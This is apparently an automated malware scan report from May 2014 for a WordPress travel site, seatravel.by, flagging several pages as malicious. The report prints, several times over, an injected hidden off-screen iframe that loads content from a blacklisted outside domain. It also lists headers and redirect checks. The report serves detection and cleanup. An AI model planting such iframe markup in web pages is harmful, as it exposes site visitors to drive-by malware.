Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=seatravel.by
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://seatravel.by/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 May 2014 13:05:11 GMT Location: http://www.seatravel.by/ Server: nginx/1.4.4 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.seatravel.by/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://www.seatravel.by/ | 200 OK Content-Length: 43064 Content-Type: text/html | malicious |
Suspicious code found <div style='clear:both;'><ul class='nostyle' style='float:left'>
<li> <div class='fb-like' data-href='http://www.seatravel.by/' data-send='false' data-layout='button_count' data-width='100' data-show-faces='true' > ...[2030 bytes skipped]... Malicious iFrame found. size: 640x480 src: http://adv-inc-net.com/trackingcode/tracker.html This URL is marked by Google as suspicious <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> | ||
http://www.seatravel.by/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/x-javascript | clean |
http://www.seatravel.by/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://www.seatravel.by/wp-content/plugins/anti-spam/js/anti-spam.js?ver=2.1 | 200 OK Content-Length: 1694 Content-Type: application/x-javascript | clean |
http://www.seatravel.by/wp-content/plugins/vkontakte-api/js/callback.js?ver=3.9.1 | 200 OK Content-Length: 5165 Content-Type: application/x-javascript | clean |
http://www.seatravel.by/wp-content/plugins/easing-slider/js/slideshow.min.js?ver=2.1.4.1 | 200 OK Content-Length: 7030 Content-Type: application/x-javascript | clean |
http://www.seatravel.by/wp-content/plugins/fancybox-for-wordpress/fancybox/jquery.fancybox.js?ver=1.3.4 | 200 OK Content-Length: 15667 Content-Type: application/x-javascript | clean |
http://www.seatravel.by/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.4.7.3 | 200 OK Content-Length: 1190 Content-Type: application/x-javascript | clean |
http://www.lifestyleatlanta.com/hidecounter.php | 404 Not Found Content-Length: 303 Content-Type: text/html | clean |
http://www.lifestyleatlanta.com/test404page.js | 404 Not Found Content-Length: 571 Content-Type: text/html | clean |
http://www.seatravel.by/hwSlider/jquery-1.7.2.min.js | 404 Not Found Content-Length: 24070 Content-Type: text/html | malicious |
Page code contains blacklisted domain: adv-inc-net.com ...[27591 bytes skipped]... /www.seatravel.by\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"\u041e\u0442\u043f\u0440\u0430\u0432\u043a\u0430..."}; /* ]]> */ </script> <script type='text/javascript' src='http://www.seatravel.by/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8'></script> </div><!-- end #page --> </body> </html> <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> Malicious iFrame found. size: 640x480 src: http://adv-inc-net.com/trackingcode/tracker.html This URL is marked by Google as suspicious <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> | ||
http://www.seatravel.by/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.50.0-2014.02.05 | 200 OK Content-Length: 16305 Content-Type: application/x-javascript | clean |
http://www.seatravel.by/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8 | 200 OK Content-Length: 9630 Content-Type: application/x-javascript | clean |
http://www.seatravel.by/%D1%80%D0%B5%D1%81%D1%82%D0%BE%D1%80%D0%B0%D0%BD-bella-rosa/ | 200 OK Content-Length: 26627 Content-Type: text/html | malicious |
Page code contains blacklisted domain: adv-inc-net.com ...[30276 bytes skipped]... /www.seatravel.by\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"\u041e\u0442\u043f\u0440\u0430\u0432\u043a\u0430..."}; /* ]]> */ </script> <script type='text/javascript' src='http://www.seatravel.by/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8'></script> </div><!-- end #page --> </body> </html> <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> Malicious iFrame found. size: 640x480 src: http://adv-inc-net.com/trackingcode/tracker.html This URL is marked by Google as suspicious <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> | ||
http://www.seatravel.by/%D1%80%D0%B5%D1%81%D1%82%D0%BE%D1%80%D0%B0%D0%BD-limoncello/ | 200 OK Content-Length: 26043 Content-Type: text/html | malicious |
Page code contains blacklisted domain: adv-inc-net.com ...[29658 bytes skipped]... /www.seatravel.by\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"\u041e\u0442\u043f\u0440\u0430\u0432\u043a\u0430..."}; /* ]]> */ </script> <script type='text/javascript' src='http://www.seatravel.by/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8'></script> </div><!-- end #page --> </body> </html> <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> Malicious iFrame found. size: 640x480 src: http://adv-inc-net.com/trackingcode/tracker.html This URL is marked by Google as suspicious <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: seatravel.by
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 11 May 2014 13:05:11 GMT
Location: http://www.seatravel.by/
Server: nginx/1.4.4
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.seatravel.by/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
GET / HTTP/1.1
Host: seatravel.by
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 11 May 2014 13:05:11 GMT
Location: http://www.seatravel.by/
Server: nginx/1.4.4
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.seatravel.by/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: seatravel.by
Referer: http://www.google.com/search?q=seatravel.by
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: seatravel.by
Referer: http://www.google.com/search?q=seatravel.by
Result:
The result is similar to the first query. There are no suspicious redirects found.